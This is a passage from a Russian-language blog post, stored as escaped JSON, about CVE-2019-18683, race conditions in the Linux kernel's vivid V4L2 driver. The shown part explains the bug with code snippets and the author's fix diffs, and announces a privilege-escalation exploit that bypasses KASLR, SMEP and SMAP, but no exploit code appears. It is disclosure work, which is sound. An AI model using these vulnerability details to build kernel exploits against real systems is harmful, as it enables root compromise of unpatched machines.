{"id":300012,"date":"2020-03-12T09:00:40","date_gmt":"2020-03-12T09:00:40","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=300012"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=300012","title":{"rendered":"CVE-2019-18683: \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0435 V4L2 \u044f\u0434\u0440\u0430 Linux"},"content":{"rendered":"\n<div class=\"post__text post__text-html post__text_v1\" id=\"post-content-body\" data-io-article-url=\"https:\/\/habr.com\/ru\/company\/pt\/blog\/491756\/\">\n<p>\u0412 \u0434\u0430\u043d\u043d\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0430 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2019-18683\">CVE-2019-18683<\/a> \u0432 \u044f\u0434\u0440\u0435 Linux, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b \u0432 \u043a\u043e\u043d\u0446\u0435 2019 \u0433\u043e\u0434\u0430. \u0423\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0439 CVE-\u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u043c \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u043c \u043e\u0448\u0438\u0431\u043a\u0430\u043c \u0442\u0438\u043f\u0430 \u00ab\u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0433\u043e\u043d\u043a\u0438\u00bb, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0438 \u0432 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0435 <code>V4L2<\/code> \u044f\u0434\u0440\u0430 Linux \u043d\u0430 \u043f\u0440\u043e\u0442\u044f\u0436\u0435\u043d\u0438\u0438 \u043f\u044f\u0442\u0438 \u043b\u0435\u0442. \u041f\u044f\u0442\u043d\u0430\u0434\u0446\u0430\u0442\u043e\u0433\u043e \u0444\u0435\u0432\u0440\u0430\u043b\u044f \u044f \u0432\u044b\u0441\u0442\u0443\u043f\u0438\u043b \u0441 \u0434\u043e\u043a\u043b\u0430\u0434\u043e\u043c \u043f\u043e \u0434\u0430\u043d\u043d\u043e\u0439 \u0442\u0435\u043c\u0435 \u043d\u0430 \u043a\u043e\u043d\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0438 <a href=\"https:\/\/www.offensivecon.org\/speakers\/2020\/alexander-popov.html\">OffensiveCon 2020<\/a> (<a href=\"https:\/\/a13xp0p0v.github.io\/img\/CVE-2019-18683.pdf\">\u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043f\u0440\u0435\u0437\u0435\u043d\u0442\u0430\u0446\u0438\u044e<\/a>).<\/p>\n<p>  <\/p>\n<p>\u0414\u0430\u043b\u0435\u0435 \u044f \u0434\u0435\u0442\u0430\u043b\u044c\u043d\u043e \u043e\u0431\u044a\u044f\u0441\u043d\u044e, \u043a\u0430\u043a \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u044b\u0439 \u043c\u043d\u043e\u0439 \u043f\u0440\u043e\u0442\u043e\u0442\u0438\u043f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 (PoC exploit) \u0434\u043b\u044f \u043c\u0438\u043a\u0440\u043e\u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u044b <code>x86_64<\/code>. \u0414\u0430\u043d\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0435 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0430 \u044f\u0434\u0435\u0440\u043d\u043e\u0433\u043e \u043f\u043e\u0442\u043e\u043a\u0430, \u0433\u0434\u0435 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0430\u0434\u0440\u0435\u0441\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0430. \u0412 \u0441\u0442\u0430\u0442\u044c\u0435 \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043d\u043e, \u043a\u0430\u043a \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0434\u043b\u044f Ubuntu Server 18.04 \u043e\u0431\u0445\u043e\u0434\u0438\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0437\u0430\u0449\u0438\u0442\u044b: <code>KASLR<\/code>, <code>SMEP<\/code> \u0438 <code>SMAP<\/code>.<\/p>\n<p>  <\/p>\n<p>\u041d\u0430\u0447\u043d\u0435\u043c \u0441 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u0438 \u0440\u0430\u0431\u043e\u0442\u044b \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430.<br \/>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/webt\/vt\/lj\/fi\/vtljfid4eunc_37k0zverpugslg.jpeg\"><\/p>\n<p><a name=\"habracut\"><\/a>  <\/p>\n<p><a href=\"https:\/\/youtu.be\/mb4YHyLy0Zc\">\u0412\u0438\u0434\u0435\u043e \u0441 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u0435\u0439 \u0440\u0430\u0431\u043e\u0442\u044b \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430:<\/a><\/p>\n<p>  <\/p>\n<div class=\"oembed\">\n<div>\n<div style=\"left: 0; width: 100%; height: 0; position: relative; padding-bottom: 56.25%;\"><iframe src=\"https:\/\/www.youtube.com\/embed\/mb4YHyLy0Zc?rel=0&amp;showinfo=1&amp;hl=en-US\" style=\"border: 0; top: 0; left: 0; width: 100%; height: 100%; position: absolute;\" allowfullscreen scrolling=\"no\" allow=\"encrypted-media; accelerometer; gyroscope; picture-in-picture\"><\/iframe><\/div>\n<\/div>\n<\/div>\n<h2 id=\"uyazvimosti\">\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438<\/h2>\n<p>  <\/p>\n<p>\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2019-18683\">CVE-2019-18683<\/a> \u0432\u044b\u0437\u0432\u0430\u043d\u044b \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0439 \u0440\u0430\u0431\u043e\u0442\u043e\u0439 \u0441 \u044f\u0434\u0435\u0440\u043d\u044b\u043c \u043f\u0440\u0438\u043c\u0438\u0442\u0438\u0432\u043e\u043c \u0441\u0438\u043d\u0445\u0440\u043e\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0432 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0435 <code>vivid<\/code> \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u044b <code>V4L2<\/code> (<a href=\"https:\/\/elixir.bootlin.com\/linux\/v5.4\/source\/drivers\/media\/platform\/vivid\"><code>drivers\/media\/platform\/vivid<\/code><\/a>). \u0414\u0430\u043d\u043d\u044b\u0439 \u0434\u0440\u0430\u0439\u0432\u0435\u0440 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u044f \u043a\u0430\u043a\u043e\u0433\u043e-\u043b\u0438\u0431\u043e \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f. \u0423\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u0434\u0440\u0430\u0439\u0432\u0435\u0440 \u043f\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0432 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445 Ubuntu, Debian, Arch Linux, SUSE Linux Enterprise \u0438 openSUSE \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043c\u043e\u0434\u0443\u043b\u044f \u044f\u0434\u0440\u0430 (<code>CONFIG_VIDEO_VIVID=m<\/code>).<\/p>\n<p>  <\/p>\n<p>\u0414\u0440\u0430\u0439\u0432\u0435\u0440 <code>vivid<\/code> \u044d\u043c\u0443\u043b\u0438\u0440\u0443\u0435\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435 \u043e\u0431\u043e\u0440\u0443\u0434\u043e\u0432\u0430\u043d\u0438\u0435, \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u043e\u0435 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u043e\u0439 <code>video4linux<\/code>: \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0432\u0438\u0434\u0435\u043e\u0437\u0430\u0445\u0432\u0430\u0442\u0430 \u0438 \u0432\u0438\u0434\u0435\u043e\u0432\u044b\u0432\u043e\u0434\u0430, \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u043f\u0440\u0438\u0435\u043c\u043d\u0438\u043a\u0438 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0442\u0447\u0438\u043a\u0438 \u0440\u0430\u0434\u0438\u043e\u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432 \u0438 \u043f\u0440\u043e\u0447\u0435\u0435. \u0412\u0432\u043e\u0434 \u0438 \u0432\u044b\u0432\u043e\u0434 \u043e\u0442 <code>vivid<\/code>-\u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u043f\u043e\u0432\u0442\u043e\u0440\u044f\u0435\u0442 \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0435 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0433\u043e \u043e\u0431\u043e\u0440\u0443\u0434\u043e\u0432\u0430\u043d\u0438\u044f. \u042d\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0439 \u0434\u0440\u0430\u0439\u0432\u0435\u0440 \u0434\u043b\u044f \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u041f\u041e, \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u0441 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u043e\u0439 <code>V4L2<\/code>. \u0420\u0430\u0431\u043e\u0442\u0430 \u0441 \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0430\u043c\u0438 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430 <code>vivid<\/code> \u043e\u043f\u0438\u0441\u0430\u043d\u0430 \u0432 <a href=\"https:\/\/www.kernel.org\/doc\/html\/latest\/media\/v4l-drivers\/vivid.html\">\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438 \u044f\u0434\u0440\u0430 Linux<\/a>.<\/p>\n<p>  <\/p>\n<p>\u0412 Ubuntu <code>vivid<\/code>-\u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e, \u0442\u0430\u043a \u043a\u0430\u043a Ubuntu \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442 \u0434\u043b\u044f \u043d\u0438\u0445 RW ACL \u043f\u0440\u0438 \u0432\u0445\u043e\u0434\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443:<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">  a13x@ubuntu_server_1804:~$ getfacl \/dev\/video0   getfacl: Removing leading '\/' from absolute path names   # file: dev\/video0   # owner: root   # group: video   user::rw-   user:a13x:rw-   group::rw-   mask::rw-   other::---<\/code><\/pre>\n<p>  <\/p>\n<p>\u041a \u0441\u043e\u0436\u0430\u043b\u0435\u043d\u0438\u044e (\u0438\u043b\u0438 \u043a \u0441\u0447\u0430\u0441\u0442\u044c\u044e?), \u044f \u043d\u0435 \u043d\u0430\u0448\u0435\u043b \u0441\u043f\u043e\u0441\u043e\u0431\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u043c\u043e\u0434\u0443\u043b\u044f \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435. \u042d\u0442\u043e \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u043b\u043e \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2019-18683\">CVE-2019-18683<\/a>. \u041f\u043e \u044d\u0442\u043e\u0439 \u043f\u0440\u0438\u0447\u0438\u043d\u0435 \u043a\u043e\u043c\u0438\u0442\u0435\u0442 \u043f\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u044f\u0434\u0440\u0430 Linux \u0440\u0430\u0437\u0440\u0435\u0448\u0438\u043b \u043c\u043d\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0442\u0430\u043a \u043d\u0430\u0437\u044b\u0432\u0430\u0435\u043c\u043e\u0435 <a href=\"https:\/\/www.openwall.com\/lists\/oss-security\/2019\/11\/02\/1\">\u043f\u043e\u043b\u043d\u043e\u0435 \u0440\u0430\u0437\u0433\u043b\u0430\u0448\u0435\u043d\u0438\u0435<\/a> (full disclosure).<\/p>\n<p>  <\/p>\n<h2 id=\"oshibki-i-ispravleniya\">\u041e\u0448\u0438\u0431\u043a\u0438 \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f<\/h2>\n<p>  <\/p>\n<p>\u0414\u043b\u044f \u043f\u043e\u0438\u0441\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b \u0444\u0430\u0437\u0437\u0435\u0440 <a href=\"https:\/\/github.com\/google\/syzkaller\/\">syzkaller<\/a> \u0441\u043e \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u043c\u0438 \u0434\u043e\u0440\u0430\u0431\u043e\u0442\u043a\u0430\u043c\u0438. \u0424\u0430\u0437\u0437\u0435\u0440 \u0441\u043f\u0440\u043e\u0432\u043e\u0446\u0438\u0440\u043e\u0432\u0430\u043b \u043f\u0430\u0434\u0435\u043d\u0438\u0435 \u044f\u0434\u0440\u0430. \u0412 \u044f\u0434\u0435\u0440\u043d\u043e\u043c \u0436\u0443\u0440\u043d\u0430\u043b\u0435 (kernel log) \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u0441\u044f \u043e\u0442\u0447\u0435\u0442 KASAN \u043e\u0431 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u043e\u0441\u043b\u0435 \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d\u0438\u044f (use-after-free) \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441\u043e \u0441\u0432\u044f\u0437\u043d\u044b\u043c \u0441\u043f\u0438\u0441\u043a\u043e\u043c \u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 <code>vid_cap_buf_queue()<\/code>. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u0440\u0438\u0447\u0438\u043d \u043e\u0448\u0438\u0431\u043a\u0438 \u0443\u0432\u0435\u043b\u043e \u043c\u0435\u043d\u044f \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u0434\u0430\u043b\u0435\u043a\u043e \u043e\u0442 \u0435\u0435 \u0441\u0438\u043c\u043f\u0442\u043e\u043c\u043e\u0432. \u0412 \u0438\u0442\u043e\u0433\u0435 \u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b <strong>\u043f\u043e\u0432\u0442\u043e\u0440\u044f\u044e\u0449\u0438\u0439\u0441\u044f \u043e\u0448\u0438\u0431\u043e\u0447\u043d\u044b\u0439 \u043f\u043e\u0434\u0445\u043e\u0434<\/strong> \u043a \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0430\u043c \u044f\u0434\u0435\u0440\u043d\u043e\u0433\u043e \u043c\u044c\u044e\u0442\u0435\u043a\u0441\u0430 \u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u044f\u0445 <code>vivid_stop_generating_vid_cap()<\/code>, <code>vivid_stop_generating_vid_out()<\/code> \u0438 <code>sdr_cap_stop_streaming()<\/code>. \u042d\u0442\u043e \u043f\u0440\u0438\u0432\u0435\u043b\u043e \u043a \u0442\u0440\u0435\u043c \u0438\u0434\u0435\u043d\u0442\u0438\u0447\u043d\u044b\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u0432\u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u0438 \u0431\u044b\u043b \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2019-18683\">CVE-2019-18683<\/a>.<\/p>\n<p>  <\/p>\n<p>\u0414\u0430\u043d\u043d\u044b\u0435 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u0432\u044b\u0437\u044b\u0432\u0430\u044e\u0442\u0441\u044f \u043f\u0440\u0438 \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0435 \u0432\u0438\u0434\u0435\u043e\u0441\u0442\u0440\u0438\u043c\u0438\u043d\u0433\u0430. \u0412\u0441\u0435 \u043e\u043d\u0438 \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u044e\u0442 \u044f\u0434\u0435\u0440\u043d\u044b\u0439 \u043c\u044c\u044e\u0442\u0435\u043a\u0441 <code>vivid_dev.mutex<\/code> \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441 \u0440\u0430\u0437\u0434\u0435\u043b\u044f\u0435\u043c\u044b\u043c\u0438 \u0440\u0435\u0441\u0443\u0440\u0441\u0430\u043c\u0438. \u041d\u043e \u0432 \u0434\u0430\u043d\u043d\u044b\u0445 \u0444\u0443\u043d\u043a\u0446\u0438\u044f\u0445 \u0434\u043e\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f \u043e\u0434\u043d\u0430 \u0438 \u0442\u0430 \u0436\u0435 \u043e\u0431\u0438\u0434\u043d\u0430\u044f \u043e\u0448\u0438\u0431\u043a\u0430 \u043f\u0440\u0438 \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0435 \u044f\u0434\u0435\u0440\u043d\u043e\u0433\u043e \u043f\u043e\u0442\u043e\u043a\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0442\u0430\u043a\u0436\u0435 \u0434\u043e\u043b\u0436\u0435\u043d \u0437\u0430\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u0442\u043e\u0442 \u0436\u0435 \u0441\u0430\u043c\u044b\u0439 \u043c\u044c\u044e\u0442\u0435\u043a\u0441. \u0420\u0430\u0437\u0431\u0435\u0440\u0435\u043c \u043e\u0448\u0438\u0431\u043a\u0443 \u043d\u0430 \u043f\u0440\u0438\u043c\u0435\u0440\u0435 <code>vivid_stop_generating_vid_cap()<\/code>:<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">    \/* shutdown control thread *\/     vivid_grab_controls(dev, false);     mutex_unlock(&amp;dev-&gt;mutex);     kthread_stop(dev-&gt;kthread_vid_cap);     dev-&gt;kthread_vid_cap = NULL;     mutex_lock(&amp;dev-&gt;mutex);<\/code><\/pre>\n<p>  <\/p>\n<p>\u041a\u0430\u043a \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u0430\u043d\u043d\u0430\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u0440\u0430\u0437\u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442 \u043c\u044c\u044e\u0442\u0435\u043a\u0441 \u0432 \u043f\u043e\u043f\u044b\u0442\u043a\u0435 \u043e\u0442\u0434\u0430\u0442\u044c \u0435\u0433\u043e \u044f\u0434\u0435\u0440\u043d\u043e\u043c\u0443 \u043f\u043e\u0442\u043e\u043a\u0443 (<code>kthread<\/code>), \u0447\u0442\u043e\u0431\u044b \u043e\u043d \u0441\u043c\u043e\u0433 \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f, \u0434\u0440\u0443\u0433\u043e\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 <code>vb2_fop_read()<\/code> \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u044d\u0442\u043e\u0442 \u043c\u044c\u044e\u0442\u0435\u043a\u0441 \u0432\u043c\u0435\u0441\u0442\u043e \u044f\u0434\u0435\u0440\u043d\u043e\u0433\u043e \u043f\u043e\u0442\u043e\u043a\u0430. \u0412 \u044d\u0442\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u044f\u0442 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0435 \u043d\u0435\u043f\u0440\u0438\u044f\u0442\u043d\u043e\u0441\u0442\u0438: <code>vb2_fop_read()<\/code> \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u0435\u0442 \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0431\u0443\u0444\u0435\u0440\u043e\u0432 <code>V4L2<\/code>, \u0447\u0442\u043e \u043f\u043e\u0437\u0436\u0435 \u0438 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044e \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u043e\u0441\u043b\u0435 \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d\u0438\u044f, \u043a\u043e\u0433\u0434\u0430 \u0432\u0438\u0434\u0435\u043e\u0441\u0442\u0440\u0438\u043c\u0438\u043d\u0433 \u0441\u043d\u043e\u0432\u0430 \u0431\u0443\u0434\u0435\u0442 \u0437\u0430\u043f\u0443\u0449\u0435\u043d.<\/p>\n<p>  <\/p>\n<p>\u0414\u043b\u044f \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u0438 \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0438\u0442\u043e\u0433\u0435 \u044f \u0441\u0434\u0435\u043b\u0430\u043b \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435:<\/p>\n<p>  <\/p>\n<ol>\n<li>\n<p>\u041e\u0442\u043a\u0430\u0437\u0430\u043b\u0441\u044f \u043e\u0442 \u0440\u0430\u0437\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u043c\u044c\u044e\u0442\u0435\u043a\u0441\u0430 \u043f\u0440\u0438 \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0435 \u0441\u0442\u0440\u0438\u043c\u0438\u043d\u0433\u0430. \u0412\u043e\u0442 \u043f\u0440\u0438\u043c\u0435\u0440 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439 \u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 <code>vivid_stop_generating_vid_cap()<\/code>, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043c\u044b \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0435\u043b\u0438 \u0432\u044b\u0448\u0435:   <\/p>\n<p>  <\/p>\n<pre><code class=\"diff\">    \/* shutdown control thread *\/     vivid_grab_controls(dev, false); -   mutex_unlock(&amp;dev-&gt;mutex);     kthread_stop(dev-&gt;kthread_vid_cap);     dev-&gt;kthread_vid_cap = NULL; -   mutex_lock(&amp;dev-&gt;mutex);<\/code><\/pre>\n<p>  <\/li>\n<li>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b <code>mutex_trylock()<\/code> \u0438 <code>schedule_timeout_uninterruptible()<\/code> \u0432 \u0446\u0438\u043a\u043b\u0435 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0445 \u044f\u0434\u0435\u0440\u043d\u044b\u0445 \u043f\u043e\u0442\u043e\u043a\u043e\u0432. \u0412 \u0447\u0430\u0441\u0442\u043d\u043e\u0441\u0442\u0438, <code>vivid_thread_vid_cap()<\/code> \u0431\u044b\u043b \u0438\u0437\u043c\u0435\u043d\u0435\u043d \u0442\u0430\u043a:   <\/p>\n<p>  <\/p>\n<pre><code class=\"diff\">    for (;;) {             try_to_freeze();             if (kthread_should_stop())                     break; -           mutex_lock(&amp;dev-&gt;mutex); +           if (!mutex_trylock(&amp;dev-&gt;mutex)) { +                   schedule_timeout_uninterruptible(1); +                   continue; +           }             ...     }<\/code><\/pre>\n<p>  <\/li>\n<\/ol>\n<p>  <\/p>\n<p>\u041a\u0430\u043a \u044d\u0442\u043e \u0441\u0442\u0430\u043b\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c? \u041a\u043e\u0433\u0434\u0430 \u043c\u044c\u044e\u0442\u0435\u043a\u0441 \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043d, \u0430 <code>kthread<\/code> \u043f\u0440\u043e\u0441\u043d\u0443\u043b\u0441\u044f, \u0435\u043c\u0443 \u043d\u0435 \u0443\u0434\u0430\u0435\u0442\u0441\u044f \u0437\u0430\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u044c\u044e\u0442\u0435\u043a\u0441, \u0438 \u043e\u043d \u0443\u0445\u043e\u0434\u0438\u0442 \u0432 \u0441\u043e\u043d \u043d\u0430 \u043e\u0434\u0438\u043d \u043a\u0432\u0430\u043d\u0442 \u044f\u0434\u0435\u0440\u043d\u043e\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438, \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u0437\u0436\u0435 